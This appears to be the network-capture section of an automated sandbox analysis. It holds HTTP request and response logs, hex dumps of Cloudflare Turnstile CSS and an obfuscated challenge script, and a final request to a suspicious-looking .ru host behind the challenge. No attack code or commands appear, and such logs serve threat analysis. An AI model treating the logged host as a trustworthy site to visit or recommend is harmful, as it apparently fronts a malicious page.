                                                                                                    Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                                                    2024-12-23 18:11:45 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                                    Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                                                    2024-12-23 18:11:45 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                                                    Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                                                    2024-12-23 18:11:45 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                                                    Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                                    2024-12-23 18:11:45 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                                                    Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                                                    2024-12-23 18:11:45 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                                    Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    9192.168.2.549729104.18.94.414434368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 18:11:47 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f6a50df68a942a0&lang=auto HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                    Sec-Fetch-Dest: script
                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/hifl3/0x4AAAAAAA1viUI4UDuMAibc/auto/fbE/normal/auto/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2024-12-23 18:11:47 UTC331INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 23 Dec 2024 18:11:47 GMT
                                                                                                    Content-Type: application/javascript; charset=UTF-8
                                                                                                    Content-Length: 122455
                                                                                                    Connection: close
                                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8f6a50eeb8c1c33d-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2024-12-23 18:11:47 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                                                    Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"http
                                                                                                    2024-12-23 18:11:47 UTC1369INData Raw: 72 65 64 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65 25 32 30 70 72 6f
                                                                                                    Data Ascii: red","human_button_text":"Verify%20you%20are%20human","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20pro
                                                                                                    2024-12-23 18:11:47 UTC1369INData Raw: 2c 66 55 2c 66 59 2c 66 5a 2c 67 32 2c 67 33 2c 67 74 2c 67 75 2c 67 42 2c 67 30 2c 67 31 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 37 30 30 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 33 32 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 34 36 37 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 32 31 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 35 34 39 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 67 49 28 39 35 39 29 29 2f 36 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 32 39 29 29 2f 37 2a 28 70 61 72 73 65 49 6e 74 28 67 49
                                                                                                    Data Ascii: ,fU,fY,fZ,g2,g3,gt,gu,gB,g0,g1){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(700))/1*(-parseInt(gI(1032))/2)+-parseInt(gI(467))/3*(-parseInt(gI(1421))/4)+parseInt(gI(549))/5+parseInt(gI(959))/6+-parseInt(gI(1429))/7*(parseInt(gI
                                                                                                    2024-12-23 18:11:47 UTC1369INData Raw: 29 2c 6a 5b 67 4d 28 31 35 37 31 29 5d 3d 67 4d 28 35 38 32 29 2c 6a 5b 67 4d 28 34 30 32 29 5d 3d 67 4d 28 38 31 38 29 2c 6a 29 3b 74 72 79 7b 69 66 28 6c 3d 65 4f 28 67 5b 67 4d 28 31 30 35 31 29 5d 2c 67 5b 67 4d 28 37 30 31 29 5d 29 2c 6b 5b 67 4d 28 35 35 33 29 5d 28 67 5b 67 4d 28 31 30 35 31 29 5d 2c 45 72 72 6f 72 29 3f 67 5b 67 4d 28 31 30 35 31 29 5d 3d 4a 53 4f 4e 5b 67 4d 28 34 31 38 29 5d 28 67 5b 67 4d 28 31 30 35 31 29 5d 2c 4f 62 6a 65 63 74 5b 67 4d 28 34 34 32 29 5d 28 67 5b 67 4d 28 31 30 35 31 29 5d 29 29 3a 67 5b 67 4d 28 31 30 35 31 29 5d 3d 4a 53 4f 4e 5b 67 4d 28 34 31 38 29 5d 28 67 5b 67 4d 28 31 30 35 31 29 5d 29 2c 6d 3d 69 7c 7c 67 4d 28 31 36 31 30 29 2c 6e 3d 65 4d 5b 67 4d 28 32 37 36 29 5d 5b 67 4d 28 36 36 37 29 5d 3f 6b
                                                                                                    Data Ascii: ),j[gM(1571)]=gM(582),j[gM(402)]=gM(818),j);try{if(l=eO(g[gM(1051)],g[gM(701)]),k[gM(553)](g[gM(1051)],Error)?g[gM(1051)]=JSON[gM(418)](g[gM(1051)],Object[gM(442)](g[gM(1051)])):g[gM(1051)]=JSON[gM(418)](g[gM(1051)]),m=i||gM(1610),n=eM[gM(276)][gM(667)]?k
                                                                                                    2024-12-23 18:11:47 UTC1369INData Raw: 38 32 29 29 7b 69 66 28 78 3d 42 2e 68 5b 43 2e 67 5e 31 37 36 2e 33 39 5d 2c 65 5b 67 4e 28 35 37 37 29 5d 28 30 2c 44 5b 67 4e 28 31 36 30 29 5d 29 29 7b 66 6f 72 28 6f 3d 65 5b 67 4e 28 31 33 38 37 29 5d 5b 67 4e 28 35 30 31 29 5d 28 27 7c 27 29 2c 73 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 6f 5b 73 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 55 2e 68 5b 56 2e 67 5e 31 31 32 2e 30 37 5d 3d 57 5b 67 4e 28 37 37 30 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 76 3d 53 5b 67 4e 28 37 37 30 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 69 66 28 2d 31 3d 3d 3d 76 29 74 68 72 6f 77 20 54 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 50 2e 68 5b 32 32 2e 32 31 5e 51 2e 67 5d 3d 52 3b 63 6f 6e 74 69 6e 75
                                                                                                    Data Ascii: 82)){if(x=B.h[C.g^176.39],e[gN(577)](0,D[gN(160)])){for(o=e[gN(1387)][gN(501)]('|'),s=0;!![];){switch(o[s++]){case'0':U.h[V.g^112.07]=W[gN(770)]();continue;case'1':v=S[gN(770)]();continue;case'2':if(-1===v)throw T;continue;case'3':P.h[22.21^Q.g]=R;continu
                                                                                                    2024-12-23 18:11:47 UTC1369INData Raw: 29 5d 29 3f 66 72 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 68 44 29 7b 68 44 3d 68 43 2c 64 5b 68 44 28 31 33 33 37 29 5d 28 66 52 29 7d 2c 31 65 33 29 3a 65 26 26 65 5b 68 43 28 35 36 35 29 5d 3d 3d 3d 68 43 28 31 31 34 33 29 26 26 65 5b 68 43 28 31 34 39 39 29 5d 3d 3d 3d 68 43 28 31 30 37 36 29 26 26 64 5b 68 43 28 32 38 33 29 5d 28 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 2c 66 72 29 7d 29 2c 66 74 3d 21 5b 5d 2c 21 65 55 28 67 4a 28 32 32 33 29 29 26 26 28 66 52 28 29 2c 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 69 61 2c 63 2c 64 2c 65 29 7b 69 61 3d 67 4a 2c 63 3d 7b 27 44 44 57 65 43 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 7d 2c 64 3d 65 4d 5b 69 61 28 32 37 36 29 5d 5b
                                                                                                    Data Ascii: )])?fr=setInterval(function(hD){hD=hC,d[hD(1337)](fR)},1e3):e&&e[hC(565)]===hC(1143)&&e[hC(1499)]===hC(1076)&&d[hC(283)](clearInterval,fr)}),ft=![],!eU(gJ(223))&&(fR(),setInterval(function(ia,c,d,e){ia=gJ,c={'DDWeC':function(f){return f()}},d=eM[ia(276)][
                                                                                                    2024-12-23 18:11:47 UTC1369INData Raw: 33 31 30 29 5d 5b 69 67 28 31 33 32 34 29 5d 26 26 67 5b 69 67 28 36 38 39 29 5d 3f 67 5b 69 67 28 31 33 31 30 29 5d 5b 69 67 28 31 33 32 34 29 5d 28 6e 65 77 20 67 5b 28 69 67 28 36 38 39 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 69 69 2c 48 29 7b 66 6f 72 28 69 69 3d 69 67 2c 47 5b 69 69 28 31 32 39 33 29 5d 28 29 2c 48 3d 30 3b 48 3c 47 5b 69 69 28 31 36 30 29 5d 3b 47 5b 48 5d 3d 3d 3d 47 5b 48 2b 31 5d 3f 47 5b 69 69 28 38 32 37 29 5d 28 48 2b 31 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 69 67 28 39 36 35 29 5d 5b 69 67 28 39 33 38 29 5d 28 42 29 2c 43 3d 30 3b 6f 5b 69 67 28 36 37 30 29 5d 28 43 2c 78 5b 69 67 28 31 36 30 29 5d
                                                                                                    Data Ascii: 310)][ig(1324)]&&g[ig(689)]?g[ig(1310)][ig(1324)](new g[(ig(689))](x)):function(G,ii,H){for(ii=ig,G[ii(1293)](),H=0;H<G[ii(160)];G[H]===G[H+1]?G[ii(827)](H+1,1):H+=1);return G}(x),B='nAsAaAb'.split('A'),B=B[ig(965)][ig(938)](B),C=0;o[ig(670)](C,x[ig(160)]
                                                                                                    2024-12-23 18:11:47 UTC1369INData Raw: 5b 69 52 28 32 37 36 29 5d 5b 69 52 28 31 31 34 31 29 5d 2b 27 5f 27 2b 30 2c 6c 3d 6c 5b 69 52 28 32 39 39 29 5d 28 2f 2e 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 2c 69 53 29 7b 69 53 3d 69 52 2c 6a 5e 3d 6c 5b 69 53 28 31 33 37 30 29 5d 28 73 29 7d 29 2c 66 3d 65 4d 5b 69 52 28 31 32 39 31 29 5d 28 66 29 2c 6b 3d 5b 5d 2c 69 3d 2d 31 3b 21 69 73 4e 61 4e 28 6d 3d 66 5b 69 52 28 31 33 37 30 29 5d 28 2b 2b 69 29 29 3b 6b 5b 69 52 28 35 35 32 29 5d 28 53 74 72 69 6e 67 5b 69 52 28 38 34 31 29 5d 28 28 68 5b 69 52 28 31 34 35 32 29 5d 28 68 5b 69 52 28 31 31 32 37 29 5d 28 68 5b 69 52 28 31 35 38 37 29 5d 28 6d 2c 32 35 35 29 2c 6a 29 2c 69 25 36 35 35 33 35 29 2b 36 35 35 33 35 29 25 32 35 35 29 29 29 3b 72 65 74 75 72 6e 20 6b 5b 69 52 28 34 32 39 29
                                                                                                    Data Ascii: [iR(276)][iR(1141)]+'_'+0,l=l[iR(299)](/./g,function(n,s,iS){iS=iR,j^=l[iS(1370)](s)}),f=eM[iR(1291)](f),k=[],i=-1;!isNaN(m=f[iR(1370)](++i));k[iR(552)](String[iR(841)]((h[iR(1452)](h[iR(1127)](h[iR(1587)](m,255),j),i%65535)+65535)%255)));return k[iR(429)
                                                                                                    2024-12-23 18:11:47 UTC1369INData Raw: 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 71 4a 47 50 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 55 41 67 67 48 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 72 66 67 65 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 6a 57 69 73 78 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 4c 6a 64 41 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 51 65 4d 59 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 56 58 56 73 46 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 7d 2c 65
                                                                                                    Data Ascii: {return h&i},'qJGPS':function(h,i){return h<i},'UAggH':function(h,i){return i!=h},'rfgep':function(h,i){return h(i)},'jWisx':function(h,i){return h&i},'LjdAQ':function(h,i){return h<i},'QeMYh':function(h,i){return h+i},'VXVsF':function(h,i){return h+i}},e
                                                                                                    2024-12-23 18:11:47 UTC1369INData Raw: 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 43 3d 28 44 2d 2d 2c 44 3d 3d 30 26 26 28 44 3d 4d 61 74 68 5b 69 57 28 32 33 34 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 78 5b 4c 5d 3d 45 2b 2b 2c 64 5b 69 57 28 31 39 38 29 5d 28 53 74 72 69 6e 67 2c 4b 29 29 7d 69 66 28 27 27 21 3d 3d 43 29 7b 69 66 28 4f 62 6a 65 63 74 5b 69 57 28 31 32 31 31 29 5d 5b 69 57 28 35 37 31 29 5d 5b 69 57 28 31 32 31 36 29 5d 28 42 2c 43 29 29 7b 69 66 28 64 5b 69 57 28 33 33 35 29 5d 28 64 5b 69 57 28 31 32 32 30 29 5d 2c 64 5b 69 57 28 35 32 31 29 5d 29 29 7b 69 66 28 64 5b 69 57 28 31 30 36 35 29 5d 28 32 35 36 2c 43 5b 69 57 28 31 33 37 30 29 5d 28 30 29 29 29 7b 66 6f 72 28 73 3d 30 3b 64 5b 69 57 28 39 36 36 29 5d 28 73 2c 46 29 3b 48 3c 3c
                                                                                                    Data Ascii: o(H)),H=0):I++,M>>=1,s++);C=(D--,D==0&&(D=Math[iW(234)](2,F),F++),x[L]=E++,d[iW(198)](String,K))}if(''!==C){if(Object[iW(1211)][iW(571)][iW(1216)](B,C)){if(d[iW(335)](d[iW(1220)],d[iW(521)])){if(d[iW(1065)](256,C[iW(1370)](0))){for(s=0;d[iW(966)](s,F);H<<


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    10192.168.2.549728104.18.94.414434368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 18:11:47 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                    Sec-Fetch-Dest: image
                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/hifl3/0x4AAAAAAA1viUI4UDuMAibc/auto/fbE/normal/auto/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2024-12-23 18:11:47 UTC240INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 23 Dec 2024 18:11:47 GMT
                                                                                                    Content-Type: image/png
                                                                                                    Content-Length: 61
                                                                                                    Connection: close
                                                                                                    cache-control: max-age=2629800, public
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8f6a50eebc6d42db-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2024-12-23 18:11:47 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                    Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    11192.168.2.549713172.67.143.1374434368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 18:11:48 UTC1317OUTGET /favicon.ico HTTP/1.1
                                                                                                    Host: n6b.kolivane.ru
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                    Sec-Fetch-Dest: image
                                                                                                    Referer: https://n6b.kolivane.ru/da4scmQ/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
